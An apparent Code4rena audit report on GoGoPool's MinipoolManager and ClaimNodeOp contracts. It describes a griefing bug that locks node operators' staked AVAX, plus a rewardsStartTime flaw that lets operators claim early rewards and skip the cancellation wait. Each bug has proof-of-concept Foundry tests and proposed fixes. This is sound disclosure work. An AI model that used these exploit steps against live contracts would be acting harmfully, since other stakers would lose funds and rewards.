Platform: Code4rena
Start Date: 15/12/2022
Pot Size: $128,000 USDC
Total HM: 28
Participants: 111
Period: 19 days
Judge: GalloDaSballo
Total Solo HM: 1
Id: 194
League: ETH
Rank: 56/111
Findings: 2
Award: $128.81
🌟 Selected for report: 0
🌟 Solo Findings: 0

🌟 Selected for report: 0xdeadbeef0x
Also found by: 0Kage, 0xc0ffEE, 0xmint, AkshaySrivastav, Allarious, Ch_301, Franfran, HollaDieWaldfee, IllIllI, Jeiwan, Lirios, Manboy, adriro, ak1, bin2chen, caventa, chaduke, clems4ever, cozzetti, datapunk, imare, immeas, kaliberpoziomka8552, ladboy233, pauliax, peritoflores, rvierdiiev, sces60107, sk8erboy, stealthyz, unforgiven, wagmi, wallstreetvilkas, yixxas
9.9345 USDC - $9.93
https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L242-L246 https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L163-L164 https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L289
Currently it is possible to create a minipool with an existing node ID, which resets the existing minipool's attributes and makes it impossible for the previous node operator to withdraw their staked assets and rewards. The minimum amount of AVAX a node operator must deposit into a minipool is 1,000 AVAX, which is about $11,600 USD at the time of writing; with multiple minipools affected, this dollar amount could get very high.
Since this vulnerability locks up the node operator's staked assets along with the validation rewards and is easy to execute, I will report this as a High. The attack does not benefit the attacker, which is why it is called a griefing attack.
For a new minipool to be created with an existing node ID, the state of the existing minipool is supposed to be either `Finished` or `Canceled`, as stated in the natspec below. Unfortunately, these are not the only states that currently allow this. The state is checked in `MinipoolManager.createMinipool()`:
```solidity
// ...
// Create or update a minipool record for nodeID
// If nodeID exists, only allow overwriting if node is finished or canceled
// (completed its validation period and all rewards paid and processing is complete)
int256 minipoolIndex = getIndexOf(nodeID);
if (minipoolIndex != -1) {
	requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
	resetMinipoolData(minipoolIndex);
	// Also reset initialStartTime as we are starting a whole new validation
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0);
} else {
	minipoolIndex = int256(getUint(keccak256("minipool.count")));
	// The minipoolIndex is stored 1 greater than actual value. The 1 is subtracted in getIndexOf()
	setUint(keccak256(abi.encodePacked("minipool.index", nodeID)), uint256(minipoolIndex + 1));
	setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".nodeID")), nodeID);
	addUint(keccak256("minipool.count"), 1);
}
// ...
```
If `minipoolIndex != -1`, the node ID already exists, and its state is checked via `requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch)`:
```solidity
/// @notice Ensure a minipool is allowed to move to the "to" state
/// @param minipoolIndex A valid minipool index
/// @param to New status
function requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to) private view {
	bytes32 statusKey = keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status"));
	MinipoolStatus currentStatus = MinipoolStatus(getUint(statusKey));
	bool isValid;

	if (currentStatus == MinipoolStatus.Prelaunch) {
		isValid = (to == MinipoolStatus.Launched || to == MinipoolStatus.Canceled);
	} else if (currentStatus == MinipoolStatus.Launched) {
		isValid = (to == MinipoolStatus.Staking || to == MinipoolStatus.Error);
	} else if (currentStatus == MinipoolStatus.Staking) {
		isValid = (to == MinipoolStatus.Withdrawable || to == MinipoolStatus.Error);
	} else if (currentStatus == MinipoolStatus.Withdrawable || currentStatus == MinipoolStatus.Error) {
		isValid = (to == MinipoolStatus.Finished || to == MinipoolStatus.Prelaunch);
	} else if (currentStatus == MinipoolStatus.Finished || currentStatus == MinipoolStatus.Canceled) {
		// Once a node is finished/canceled, if they re-validate they go back to beginning state
		isValid = (to == MinipoolStatus.Prelaunch);
	} else {
		isValid = false;
	}

	if (!isValid) {
		revert InvalidStateTransition();
	}
}
```
We can see that the transition to `Prelaunch` is considered valid (i.e. the function does not revert) when the current minipool status is `Withdrawable`, `Error`, `Finished`, or `Canceled`. The `Withdrawable` state is where this attack would occur.
Normally, when a minipool is in the `Withdrawable` state, the node operator can call a withdraw function in `MinipoolManager.sol` to pull out their staked assets and rewards. It is during this state that another user can create a new minipool that resets the minipool's attributes; the original node operator would then fail the `onlyOwner(minipoolIndex)` check and the call would revert:
```solidity
/// @notice Withdraw function for a Node Operator to claim all AVAX funds they are due (original AVAX staked, plus any AVAX rewards)
/// @param nodeID 20-byte Avalanche node ID the Node Operator registered with
function withdrawMinipoolFunds(address nodeID) external nonReentrant {
	int256 minipoolIndex = requireValidMinipool(nodeID);
	address owner = onlyOwner(minipoolIndex);
	requireValidStateTransition(minipoolIndex, MinipoolStatus.Finished);
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Finished));

	uint256 avaxNodeOpAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")));
	uint256 avaxNodeOpRewardAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpRewardAmt")));
	uint256 totalAvaxAmt = avaxNodeOpAmt + avaxNodeOpRewardAmt;

	Staking staking = Staking(getContractAddress("Staking"));
	staking.decreaseAVAXStake(owner, avaxNodeOpAmt);

	Vault vault = Vault(getContractAddress("Vault"));
	vault.withdrawAVAX(totalAvaxAmt);

	owner.safeTransferETH(totalAvaxAmt);
}
```
Here is a test script to showcase this vulnerability; please modify the corresponding function in the `MinipoolManager.t.sol` test file. The added code is marked with 'NEW' comments:
```solidity
function testWithdrawMinipoolFunds() public {
	address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
	vm.prank(liqStaker1);
	ggAVAX.depositAVAX{value: MAX_AMT}();

	uint256 duration = 2 weeks;
	uint256 depositAmt = 1000 ether;
	uint256 avaxAssignmentRequest = 1000 ether;
	uint256 validationAmt = depositAmt + avaxAssignmentRequest;
	uint128 ggpStakeAmt = 200 ether;

	vm.startPrank(nodeOp);
	ggp.approve(address(staking), MAX_AMT);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
	vm.stopPrank();

	vm.startPrank(address(rialto));
	minipoolMgr.claimAndInitiateStaking(mp1.nodeID);
	bytes32 txID = keccak256("txid");
	minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
	skip(duration);
	uint256 rewards = 10 ether;
	uint256 halfRewards = rewards / 2;
	deal(address(rialto), address(rialto).balance + rewards);
	minipoolMgr.recordStakingEnd{value: validationAmt + rewards}(mp1.nodeID, block.timestamp, rewards);
	uint256 percentage = dao.getMinipoolNodeCommissionFeePct();
	uint256 commissionFee = (percentage).mulWadDown(halfRewards);
	vm.stopPrank();

	// NEW
	address nodeOp2 = getActorWithTokens("nodeOp", MAX_AMT, MAX_AMT);
	vm.startPrank(nodeOp2);
	ggp.approve(address(staking), MAX_AMT);
	staking.stakeGGP(ggpStakeAmt);
	minipoolMgr.createMinipool{value: depositAmt}(mp1.nodeID, 2 weeks, 0.02 ether, 1000 ether);
	vm.stopPrank();
	// NEW

	vm.startPrank(nodeOp);
	uint256 priorBalanceNodeOp = nodeOp.balance;
	vm.expectRevert();
	minipoolMgr.withdrawMinipoolFunds(mp1.nodeID);
	assertEq((nodeOp.balance), priorBalanceNodeOp);
}
```
The node operator `nodeOp2` can grief the `nodeOp` user by creating a new minipool with an existing node ID that is in the `Withdrawable` state. This test fails with `[FAIL. Reason: OnlyOwner()]` when `nodeOp` tries to withdraw.
I recommend validating the transition to `Prelaunch` correctly, disallowing the state change when the existing minipool is in the `Withdrawable` or `Error` state. The natspec quoted earlier correctly states that the transition should only be possible when the state is `Finished` or `Canceled`, so I'm not sure whether allowing this transition was a pure accident or something else. Editing the `requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to)` function to look something like the one below would fix the issue.
```diff
function requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to) private view {
	bytes32 statusKey = keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status"));
	MinipoolStatus currentStatus = MinipoolStatus(getUint(statusKey));
	bool isValid;

	if (currentStatus == MinipoolStatus.Prelaunch) {
		isValid = (to == MinipoolStatus.Launched || to == MinipoolStatus.Canceled);
	} else if (currentStatus == MinipoolStatus.Launched) {
		isValid = (to == MinipoolStatus.Staking || to == MinipoolStatus.Error);
	} else if (currentStatus == MinipoolStatus.Staking) {
		isValid = (to == MinipoolStatus.Withdrawable || to == MinipoolStatus.Error);
	} else if (currentStatus == MinipoolStatus.Withdrawable || currentStatus == MinipoolStatus.Error) {
-		isValid = (to == MinipoolStatus.Finished || to == MinipoolStatus.Prelaunch);
+		isValid = (to == MinipoolStatus.Finished);
	} else if (currentStatus == MinipoolStatus.Finished || currentStatus == MinipoolStatus.Canceled) {
		// Once a node is finished/canceled, if they re-validate they go back to beginning state
		isValid = (to == MinipoolStatus.Prelaunch);
	} else {
		isValid = false;
	}

	if (!isValid) {
		revert InvalidStateTransition();
	}
}
```
Manual review in VS Code
#0 - 0xminty
2023-01-04T00:08:13Z
dupe of #805
#1 - c4-judge
2023-01-09T12:37:36Z
GalloDaSballo marked the issue as duplicate of #213
#2 - c4-judge
2023-02-03T12:33:01Z
GalloDaSballo changed the severity to 2 (Med Risk)
#3 - c4-judge
2023-02-03T19:26:10Z
GalloDaSballo changed the severity to 3 (High Risk)
#4 - c4-judge
2023-02-08T08:26:46Z
GalloDaSballo changed the severity to 2 (Med Risk)
#5 - c4-judge
2023-02-08T08:50:11Z
GalloDaSballo changed the severity to 3 (High Risk)
#6 - c4-judge
2023-02-08T20:29:15Z
GalloDaSballo marked the issue as satisfactory
#7 - c4-judge
2023-02-09T08:53:06Z
GalloDaSballo changed the severity to QA (Quality Assurance)
#8 - Simon-Busch
2023-02-09T12:52:54Z
Changed severity back from QA to H as requested by @GalloDaSballo
🌟 Selected for report: caventa
Also found by: 0xdeadbeef0x, Allarious, Franfran, __141345__, betweenETHlines, hansfriese, mert_eren, stealthyz, unforgiven, wagmi
118.8832 USDC - $118.88
https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/MinipoolManager.sol#L225-L227 https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/ClaimNodeOp.sol#L44-L52
This is a two-part submission because the main bug is the same in both of these cases. Feel free to split these up if needed.
There is a storage variable called `staker.item<stakerIndex>.rewardsStartTime` which holds the timestamp of when a minipool was created and is used to check whether a node operator is eligible for rewards at the end of a reward cycle. This function checks the eligibility:
```solidity
/// @notice Determines if a staker is eligible for the upcoming rewards cycle
/// @dev Eligiblity: time in protocol (secs) > RewardsEligibilityMinSeconds. Rialto will call this.
function isEligible(address stakerAddr) external view returns (bool) {
	Staking staking = Staking(getContractAddress("Staking"));
	uint256 rewardsStartTime = staking.getRewardsStartTime(stakerAddr);
	uint256 elapsedSecs = (block.timestamp - rewardsStartTime);
	ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
	return (rewardsStartTime != 0 && elapsedSecs >= dao.getRewardsEligibilityMinSeconds());
}
```
To be eligible, the elapsed time between creating a minipool and calling this function must exceed `dao.getRewardsEligibilityMinSeconds()`, which is currently 14 days.
The core issue is that `staker.item<stakerIndex>.rewardsStartTime` is tied to a user instead of a minipool. This means the protocol treats all of a node operator's minipools equally when it comes to `rewardsStartTime` (every minipool has the same value for that variable). Because it is possible to create multiple minipools, `rewardsStartTime` always reflects the oldest minipool created, and the newly created ones enjoy its benefits. When new minipools are created, `rewardsStartTime` is only set if it is zero and is otherwise left unchanged; see `MinipoolManager.createMinipool()`:
```solidity
/// @notice Accept AVAX deposit from node operator to create a Minipool. Node Operator must be staking GGP. Open to public.
/// @param nodeID 20-byte Avalanche node ID
/// @param duration Requested validation period in seconds
/// @param delegationFee Percentage delegation fee in units of ether (2% is 0.2 ether)
/// @param avaxAssignmentRequest Amount of requested AVAX to be matched for this Minipool
function createMinipool(
	address nodeID,
	uint256 duration,
	uint256 delegationFee,
	uint256 avaxAssignmentRequest
) external payable whenNotPaused {
	if (nodeID == address(0)) {
		revert InvalidNodeID();
	}

	ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
	if (
		// Current rule is matched funds must be 1:1 nodeOp:LiqStaker
		msg.value != avaxAssignmentRequest ||
		avaxAssignmentRequest > dao.getMinipoolMaxAVAXAssignment() ||
		avaxAssignmentRequest < dao.getMinipoolMinAVAXAssignment()
	) {
		revert InvalidAVAXAssignmentRequest();
	}

	if (msg.value + avaxAssignmentRequest < dao.getMinipoolMinAVAXStakingAmt()) {
		revert InsufficientAVAXForMinipoolCreation();
	}

	Staking staking = Staking(getContractAddress("Staking"));
	staking.increaseMinipoolCount(msg.sender);
	staking.increaseAVAXStake(msg.sender, msg.value);
	staking.increaseAVAXAssigned(msg.sender, avaxAssignmentRequest);

	if (staking.getRewardsStartTime(msg.sender) == 0) {
		staking.setRewardsStartTime(msg.sender, block.timestamp);
	}

	uint256 ratio = staking.getCollateralizationRatio(msg.sender);
	if (ratio < dao.getMinCollateralizationRatio()) {
		revert InsufficientGGPCollateralization();
	}

	// Get a Rialto multisig to assign for this minipool
	MultisigManager multisigManager = MultisigManager(getContractAddress("MultisigManager"));
	address multisig = multisigManager.requireNextActiveMultisig();

	// Create or update a minipool record for nodeID
	// If nodeID exists, only allow overwriting if node is finished or canceled
	// (completed its validation period and all rewards paid and processing is complete)
	int256 minipoolIndex = getIndexOf(nodeID);
	if (minipoolIndex != -1) {
		requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
		resetMinipoolData(minipoolIndex);
		// Also reset initialStartTime as we are starting a whole new validation
		setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), 0);
	} else {
		minipoolIndex = int256(getUint(keccak256("minipool.count")));
		// The minipoolIndex is stored 1 greater than actual value. The 1 is subtracted in getIndexOf()
		setUint(keccak256(abi.encodePacked("minipool.index", nodeID)), uint256(minipoolIndex + 1));
		setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".nodeID")), nodeID);
		addUint(keccak256("minipool.count"), 1);
	}

	// Save the attrs individually in the k/v store
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".duration")), duration);
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".delegationFee")), delegationFee);
	setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".owner")), msg.sender);
	setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".multisigAddr")), multisig);
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpInitialAmt")), msg.value);
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxNodeOpAmt")), msg.value);
	setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")), avaxAssignmentRequest);

	emit MinipoolStatusChanged(nodeID, MinipoolStatus.Prelaunch);

	Vault vault = Vault(getContractAddress("Vault"));
	vault.depositAVAX{value: msg.value}();
}
```
The rewards start time is only set when it is zero:
```solidity
// ...
if (staking.getRewardsStartTime(msg.sender) == 0) {
	staking.setRewardsStartTime(msg.sender, block.timestamp);
}
// ...
```
The only place where `rewardsStartTime` is reset to zero is in `ClaimNodeOp.calculateAndDistributeRewards()`, and only when the staker's minipool count is zero:
```solidity
/// @notice Set the share of rewards for a staker as a fraction of 1 ether
/// @dev Rialto will call this
function calculateAndDistributeRewards(address stakerAddr, uint256 totalEligibleGGPStaked) external onlyMultisig {
	Staking staking = Staking(getContractAddress("Staking"));
	staking.requireValidStaker(stakerAddr);

	RewardsPool rewardsPool = RewardsPool(getContractAddress("RewardsPool"));
	if (rewardsPool.getRewardsCycleCount() == 0) {
		revert RewardsCycleNotStarted();
	}

	if (staking.getLastRewardsCycleCompleted(stakerAddr) == rewardsPool.getRewardsCycleCount()) {
		revert RewardsAlreadyDistributedToStaker(stakerAddr);
	}
	staking.setLastRewardsCycleCompleted(stakerAddr, rewardsPool.getRewardsCycleCount());
	uint256 ggpEffectiveStaked = staking.getEffectiveGGPStaked(stakerAddr);
	uint256 percentage = ggpEffectiveStaked.divWadDown(totalEligibleGGPStaked);
	uint256 rewardsCycleTotal = getRewardsCycleTotal();
	uint256 rewardsAmt = percentage.mulWadDown(rewardsCycleTotal);
	if (rewardsAmt > rewardsCycleTotal) {
		revert InvalidAmount();
	}

	staking.resetAVAXAssignedHighWater(stakerAddr);
	staking.increaseGGPRewards(stakerAddr, rewardsAmt);

	// check if their rewards time should be reset
	uint256 minipoolCount = staking.getMinipoolCount(stakerAddr);
	if (minipoolCount == 0) {
		staking.setRewardsStartTime(stakerAddr, 0);
	}
}
```
```solidity
uint256 minipoolCount = staking.getMinipoolCount(stakerAddr);
if (minipoolCount == 0) {
	staking.setRewardsStartTime(stakerAddr, 0);
}
```
This means that if a node operator has multiple minipools, the later ones inherit the `rewardsStartTime` of the oldest one.
I'm on the fence about reporting this as a Medium instead of a High, but since Issue-01 below directly affects the other stakers' funds by unfairly reducing them, I will report this as High since those staker rewards are 'lost'. I hope this is correct, but I understand if the severity is lowered to Medium.
After creating a normal minipool, a node operator can create another minipool which will have the same `rewardsStartTime` as their first minipool, making the new minipool eligible for rewards before the minimum staking period `RewardsEligibilityMinSeconds` (currently 14 days) has elapsed. This attack decreases the rewards distributed to the other 'legit' stakers in the current reward cycle, because more stakers are involved. Naturally, it increases the amount of rewards the attacker gets from the ongoing rewards cycle at the other stakers' expense.
The Rialto oracle checks whether a user is eligible for rewards via `ClaimNodeOp.isEligible()` and then calls `ClaimNodeOp.calculateAndDistributeRewards()`, which increases the node operator's GGP rewards. As explained above, `ClaimNodeOp.isEligible()` will return true for every one of a node operator's minipools as long as one of them is eligible, because `rewardsStartTime` stays the same.
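The mechanism can be sketched in a minimal, hypothetical Python model (illustration only; `Staking` here is a toy class, not the contract, and `ELIGIBILITY_MIN_SECS` stands in for `RewardsEligibilityMinSeconds`):

```python
ELIGIBILITY_MIN_SECS = 14 * 24 * 3600  # 14 days, as in the current ProtocolDAO setting

class Staking:
    """Toy model of the per-staker rewardsStartTime bookkeeping."""

    def __init__(self):
        self.rewards_start = {}  # staker address -> timestamp

    def create_minipool(self, staker, now):
        # Mirrors: if (staking.getRewardsStartTime(msg.sender) == 0) { set... }
        # A second minipool does NOT update the stored start time.
        if self.rewards_start.get(staker, 0) == 0:
            self.rewards_start[staker] = now

    def is_eligible(self, staker, now):
        # Mirrors ClaimNodeOp.isEligible(): eligibility is per staker, not per minipool.
        start = self.rewards_start.get(staker, 0)
        return start != 0 and now - start >= ELIGIBILITY_MIN_SECS

staking = Staking()
t0 = 100
staking.create_minipool("nodeOp1", now=t0)
# 1 second before the 14-day mark, nodeOp1 spins up a second minipool...
staking.create_minipool("nodeOp1", now=t0 + ELIGIBILITY_MIN_SECS - 1)
# ...and at the 14-day mark the staker -- and hence the 1-second-old minipool --
# is already treated as eligible for the rewards cycle.
assert staking.is_eligible("nodeOp1", now=t0 + ELIGIBILITY_MIN_SECS)
```

Because eligibility is keyed on the staker address, there is no way for the protocol to distinguish the old minipool from the freshly created one.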
Here is a test script that showcases the early-rewards bug; please edit the corresponding test function in `Scenarios.t.sol` to look like this:
```solidity
function testHalfRewardsForUnvestedGGPLargerScale() public {
	uint256 duration = 2 weeks;
	uint256 depositAmt = dao.getMinipoolMinAVAXAssignment();
	uint256 ggpStakeAmt = depositAmt.mulWadDown(dao.getMinCollateralizationRatio());

	vm.startPrank(nodeOp1);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp1 = createAndStartMinipool(depositAmt, depositAmt, 10000 days);
	vm.stopPrank();

	vm.startPrank(nodeOp2);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp2 = createAndStartMinipool(depositAmt, depositAmt, duration);
	vm.stopPrank();

	vm.startPrank(nodeOp3);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp5 = createAndStartMinipool(depositAmt, depositAmt, duration);
	vm.stopPrank();

	vm.startPrank(nodeOp4);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp6 = createAndStartMinipool(depositAmt, depositAmt, duration);
	vm.stopPrank();

	vm.startPrank(investor1);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp3 = createAndStartMinipool(depositAmt, depositAmt, duration);
	vm.stopPrank();

	vm.startPrank(investor2);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp4 = createAndStartMinipool(depositAmt, depositAmt, duration);
	vm.stopPrank();

	// 1 second before the 14 day period is over
	skip(duration - 1 seconds);

	// Create a minipool to get rewards
	vm.startPrank(nodeOp1);
	ggp.approve(address(staking), ggpStakeAmt);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory cheaterMp = createAndStartMinipool(depositAmt, depositAmt, duration);
	vm.stopPrank();

	// Skip to 14 days after minipools were created
	skip(1 seconds);

	// End the minipool that was created 1 second ago
	cheaterMp = rialto.processMinipoolEndWithRewards(cheaterMp.nodeID);
	mp1 = rialto.processMinipoolEndWithRewards(mp1.nodeID);
	mp2 = rialto.processMinipoolEndWithRewards(mp2.nodeID);
	mp3 = rialto.processMinipoolEndWithRewards(mp3.nodeID);
	mp4 = rialto.processMinipoolEndWithRewards(mp4.nodeID);
	mp5 = rialto.processMinipoolEndWithRewards(mp5.nodeID);
	mp6 = rialto.processMinipoolEndWithRewards(mp6.nodeID);

	skip(block.timestamp - rewardsPool.getRewardsCycleStartTime());
	assertTrue(rewardsPool.canStartRewardsCycle());

	// investors and regular nodes have the same eligibility requirements
	assertTrue(nopClaim.isEligible(nodeOp1), "isEligible");
	assertTrue(nopClaim.isEligible(nodeOp2), "isEligible");
	assertTrue(nopClaim.isEligible(nodeOp3), "isEligible");
	assertTrue(nopClaim.isEligible(nodeOp4), "isEligible");
	assertTrue(nopClaim.isEligible(investor1), "isEligible");
	assertTrue(nopClaim.isEligible(investor2), "isEligible");

	rialto.processGGPRewards();

	// Notice the inequality in rewards: nodeOp1 has gotten the distributed rewards
	// for both mp1 and cheaterMp, which seems off if intentional
	console.log("nodeOp1: ", staking.getGGPRewards(nodeOp1));
	assertGt(staking.getGGPRewards(nodeOp1), 2 * staking.getGGPRewards(nodeOp2));
	console.log("nodeOp2: ", staking.getGGPRewards(nodeOp2));
	console.log("nodeOp3: ", staking.getGGPRewards(nodeOp3));
	console.log("nodeOp4: ", staking.getGGPRewards(nodeOp4));
	console.log("investor1: ", staking.getGGPRewards(investor1));
	console.log("investor2: ", staking.getGGPRewards(investor2));
}
```
As shown, `nodeOp1` receives rewards for both `mp1` and `cheaterMp`, which is why the rewards of the other node operators are decreased.
A minipool can only be canceled once the time elapsed exceeds `dao.getMinipoolCancelMoratoriumSeconds()` (currently 5 days), but the check uses the staker-level rewards start time rather than the minipool's creation time. So, 5 days after creating their first minipool, a node operator can create new minipools and cancel them immediately, without any waiting period.
```solidity
/// @notice Owner of a minipool can cancel the (prelaunch) minipool
/// @param nodeID 20-byte Avalanche node ID the Owner registered with
function cancelMinipool(address nodeID) external nonReentrant {
	Staking staking = Staking(getContractAddress("Staking"));
	ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
	int256 index = requireValidMinipool(nodeID);
	onlyOwner(index);
	// make sure they meet the wait period requirement
	if (block.timestamp - staking.getRewardsStartTime(msg.sender) < dao.getMinipoolCancelMoratoriumSeconds()) {
		revert CancellationTooEarly();
	}
	_cancelMinipoolAndReturnFunds(nodeID, index);
}
```
In the function above, `staking.getRewardsStartTime(msg.sender)` returns the `rewardsStartTime` set when the calling node operator created their oldest minipool.
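The effect of keying the moratorium check on the staker-level start time can be sketched with a small, hypothetical Python model (illustration only; `MORATORIUM_SECS` stands in for `MinipoolCancelMoratoriumSeconds`):

```python
MORATORIUM_SECS = 5 * 24 * 3600  # 5 days, as in the current ProtocolDAO setting

def can_cancel(rewards_start_time: int, now: int) -> bool:
    """Mirrors the cancelMinipool() wait-period check:
    revert CancellationTooEarly() when now - rewardsStartTime < moratorium."""
    return now - rewards_start_time >= MORATORIUM_SECS

start = 100  # rewardsStartTime, set when the staker's FIRST minipool was created

# The first minipool is correctly subject to the 5-day moratorium:
assert not can_cancel(start, now=start + 1)
assert can_cancel(start, now=start + MORATORIUM_SECS)

# A second minipool created on day 6 can be canceled in the same block,
# because the check still reads the staker's original start time rather
# than the new minipool's creation time:
second_pool_created = start + 6 * 24 * 3600
assert can_cancel(start, now=second_pool_created)
```

A per-minipool timestamp (e.g. the pool's own creation time) would make the third assertion fail, which is the intended behavior.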
Please add the parts marked with 'NEW' comments to the corresponding test function in `MinipoolManager.t.sol`:
```solidity
function testCancelMinipool() public {
	uint256 duration = 2 weeks;
	uint256 depositAmt = 1000 ether;
	uint256 avaxAssignmentRequest = 1000 ether;
	uint128 ggpStakeAmt = 200 ether;

	// Warping to have the rewardsTime != 1
	vm.warp(block.timestamp + 33 days);

	vm.startPrank(nodeOp);
	ggp.approve(address(staking), MAX_AMT);
	staking.stakeGGP(ggpStakeAmt);
	MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
	// NEW
	uint256 mp1RewardsStartTime = staking.getRewardsStartTime(address(nodeOp));
	// NEW
	vm.stopPrank();

	//will fail
	vm.expectRevert(MinipoolManager.MinipoolNotFound.selector);
	minipoolMgr.cancelMinipool(address(0));

	//will fail
	vm.expectRevert(MinipoolManager.OnlyOwner.selector);
	minipoolMgr.cancelMinipool(mp1.nodeID);

	//will fail
	int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
	store.setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Error));
	vm.prank(nodeOp);
	//will fail
	vm.expectRevert(MinipoolManager.CancellationTooEarly.selector);
	minipoolMgr.cancelMinipool(mp1.nodeID);

	skip(5 days); //cancellation moratorium
	vm.prank(nodeOp);
	vm.expectRevert(MinipoolManager.InvalidStateTransition.selector);
	minipoolMgr.cancelMinipool(mp1.nodeID);
	store.setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));

	vm.startPrank(nodeOp);
	uint256 priorBalance = nodeOp.balance;
	minipoolMgr.cancelMinipool(mp1.nodeID);
	MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndex);
	assertEq(mp1Updated.status, uint256(MinipoolStatus.Canceled));
	assertEq(staking.getMinipoolCount(mp1Updated.owner), 0);
	assertEq(staking.getAVAXStake(mp1Updated.owner), 0);
	assertEq(staking.getAVAXAssigned(mp1Updated.owner), 0);
	assertEq(nodeOp.balance - priorBalance, mp1Updated.avaxNodeOpAmt);

	// NEW
	MinipoolManager.Minipool memory mp2 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
	uint256 mp2RewardsStartTime = staking.getRewardsStartTime(address(nodeOp));
	assertEq(mp1RewardsStartTime, mp2RewardsStartTime);
	// Passing the cancellation time check
	minipoolMgr.cancelMinipool(mp2.nodeID);
	// NEW
}
```
A node operator is able to create a minipool and cancel it immediately, as long as it isn't their first minipool and 5 days have passed since the creation of their oldest minipool. After the 5-day wait, a user can keep canceling new minipools immediately.
Manual review in Visual Studio Code, as well as Foundry for testing.
I hope I have explained the bug well enough to show that this problem runs quite deep in the code base. The rewards start time is assumed to be the same across all of a staker's minipools, when it should be minipool-specific (at least to prevent this bug).
Since the main problem linking the two bugs together is the `rewardsStartTime` variable, the way it is assigned should change. Currently it is assigned per user address; it could instead be assigned per minipool `nodeID`, so that rewards eligibility is checked against a minipool. Here is the original `ClaimNodeOp.isEligible()`:
```solidity
function isEligible(address stakerAddr) external view returns (bool) {
	Staking staking = Staking(getContractAddress("Staking"));
	uint256 rewardsStartTime = staking.getRewardsStartTime(stakerAddr);
	uint256 elapsedSecs = (block.timestamp - rewardsStartTime);
	ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
	return (rewardsStartTime != 0 && elapsedSecs >= dao.getRewardsEligibilityMinSeconds());
}
```
It could be changed to something like this:
```solidity
function isEligible(address nodeID) external view returns (bool) {
	Staking staking = Staking(getContractAddress("Staking"));
	MinipoolManager minipoolManager = MinipoolManager(getContractAddress("MinipoolManager"));
	int256 minipoolIndex = minipoolManager.getIndexOf(nodeID);
	if (minipoolIndex == -1) {
		revert MinipoolManager.MinipoolNotFound();
	}
	MinipoolManager.Minipool memory mp = minipoolManager.getMinipool(minipoolIndex);
	uint256 rewardStartTime = mp.startTime;
	uint256 elapsedSecs = (block.timestamp - rewardStartTime);
	ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
	return (rewardStartTime != 0 && elapsedSecs >= dao.getRewardsEligibilityMinSeconds());
}
```
Now rewards eligibility would be tied to minipools instead of their owners. The downside is that Rialto would need to enumerate all active minipools in the protocol, which is likely a higher number than the total number of node operators.
#0 - GalloDaSballo
2023-01-10T20:30:07Z
The warden sent 2 main findings as one, I'll either bulk under this one, or exceptionally may break this into two.
I recommend always sending different issues separately as you're losing awards as well as making it needlessly more complicated for the Sponsor and the Judge to understand the issues
